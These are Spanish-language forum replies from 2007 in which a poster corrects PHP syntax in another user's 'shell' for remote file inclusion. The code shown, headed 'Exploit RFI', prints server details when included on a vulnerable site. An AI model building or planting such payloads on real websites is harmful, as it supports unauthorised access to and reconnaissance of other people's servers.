| |
|
174
|
Seguridad Informática / Nivel Web / Re: Problema programacion de shell RFI
|
en: 11 Julio 2007, 00:07 am
|
|
PHP es case sensitive es decir, no es lo mismo $a que $A, partiendo de eso, $_server['SERVER_NAME'] no es lo mismo que $_SERVER['SERVER_NAME'], ya que SERVER debe de estar escrito en mayúsculas.
También he de decir a Ertai que es lo mismo $_SERVER['SERVER_NAME'] que $SERVER_NAME...
skapunky, el último código que escribí funciona correctamente, no se porque no lo utilizas.
¿Como saber si el código funciona correctamente? Sube el código a cualquier servidor con soporte PHP y si te carga todo correctamente también lo hará cuando hagas el include().
|
|
|
|
|
176
|
Seguridad Informática / Nivel Web / Re: Problema programacion de shell RFI
|
en: 10 Julio 2007, 18:59 pm
|
Deberías de leerte algún manual de PHP, no tienes mucha soltura con éste... <?php
echo "<b>Server Software: </b>".$SERVER_SOFTWARE.
"<br><b>Server Name: </b>".$SERVER_NAME.
"<br><b>Server Protocol: </b>".$SERVER_PROTOCOL.
"<br><b>Server Port: </b>".$SERVER_PORT.
"<br><b>CGI usada por el servidor: </b>".$GATEWAY_INTERFACE.
"<br><b>Directorio Root: </b>".$DOCUMENT_ROOT.
"<br><b>Tipo de conexión: </b>".$HTTP_CONNECTION.
"<br><b>Dirección IP Remitente: </b>".$REMOTE_ADDR;
?>
|
|
|
|
|
177
|
Seguridad Informática / Nivel Web / Re: Problema programacion de shell RFI
|
en: 10 Julio 2007, 17:55 pm
|
Dentro de las etiquetas <?php y ?> solo puede haber código en PHP, si quieres escribir en HTML deberás hacerlo mediante echo... <?php
//*****************************************************************************************
//* PHP shell writted by skapunky , 2007 :: Exploit RFI :: *
//*****************************************************************************************
//* __$$$$$$____________________________$$$$$________ *
//* __$$$$$$$$*_____________________,,$$$$$$$$*___ *
//* ___$$$$$$$$$$,,_______________,,$$$$$$$$$$*__ *
//* ____$$$$$$$$$$$$__ ._____.___$$$$$$$$$$$$________ *
//* ____$$$$$$$$$$$$$,_'.____.'_,,$$$$$$$$$$$$$____ *
//* ____$$$$$$$$$$$$$$,, '.__,'_$$$$$$$$$$$$$$$____ *
//* ____$$$$$$$$$$$$$$$$.@:,$$$$$$$$$$$$$$$$__ *
//* ______***$$$$$$$$$$$@@$$$$$$$$$$$****_____ *
//* __________,,,__*$$$$$$@.$$$$$$,,,,,,_______ *
//* _____,,$$$$$$$$$$$$$* @ *$$$$$$$$$$$$,,,___ *
//* ____*$$$$$$$$$$$$$*_@@_*$$$$$$$$$$$$$___ *
//* ___,,*$$$$$$$$$$$$$__.@.__*$$$$$$$$$$$$$..____ *
//* ______*$$$$$$$$$$$___*___*$$$$$$$$$$$$$$$,___ *
//* ____,,*$$$$$$$$$$_________$$$$$$$$$$$$$___ *
//* ____,$$$$$$$$$**'______$$$$$$$$$$$'***____ *
//* ____,,$$$$'_.*_______$$$$$$$$$__*____** _ *
//* *
//* License Freeware, x69.txt *
//*****************************************************************************************
?>
<html>
<body>
<b>Server Software:</b> <? echo $SERVER_SOFTWARE ?> <br>
<b>Server Name:</b> <? echo $SERVER_NAME ?> <br>
<b>Server Protocol:</b> <? echo $SERVER_PROTOCOL ?> <br>
<b>Server Port:</b> <? echo $SERVER_PORT ?> <br>
<b>CGI usada por el servidor :</b> <? echo $GATEWAY_INTERFACE ?> <br>
<b>Directorio Root:</b> <? echo $DOCUMENT_ROOT ?> <br>
<b>Tipo de conexión:</b> <? echo $HTTP_CONNECTION ?> <br>
<b>Dirección IP Remitente:</b> <? echo $REMOTE_ADDR ?> <br>
</body>
</html> |
|
|
|
|
|
| |
|
Mostrar Mensajes
